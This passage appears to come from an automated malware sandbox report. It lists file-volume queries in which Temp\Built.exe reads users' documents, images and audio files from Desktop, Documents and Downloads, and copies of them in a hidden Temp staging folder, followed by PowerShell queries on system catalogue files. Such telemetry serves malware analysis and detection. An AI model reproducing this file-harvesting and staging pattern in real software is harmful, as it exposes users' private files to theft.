    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NWTVCDUMOB.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\RAYHIWGKDI.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\RAYHIWGKDI.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\RAYHIWGKDI.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\RAYHIWGKDI.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\WUTJSCBCFX.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\YPSIACHYXW.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\YPSIACHYXW.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\NWTVCDUMOB.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\NWTVCDUMOB.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\NWTVCDUMOB.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\NWTVCDUMOB.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\RAYHIWGKDI.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\RAYHIWGKDI.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\RAYHIWGKDI.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\RAYHIWGKDI.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\RAYHIWGKDI.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\WUTJSCBCFX.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\WUTJSCBCFX.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\WUTJSCBCFX.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\YPSIACHYXW.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\YPSIACHYXW.mp3 VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\YPSIACHYXW.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Documents\YPSIACHYXW.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Documents\YPSIACHYXW.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Downloads\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Downloads\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.xlsx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Downloads\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\HTAGVDFUIE.docx VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Downloads\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\JSDNGYCOWY.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Downloads\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\LTKMYBSEYZ.pdf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Downloads\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\NIKHQAIQAU.png VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\Downloads\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Downloads\NWTVCDUMOB.jpg VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
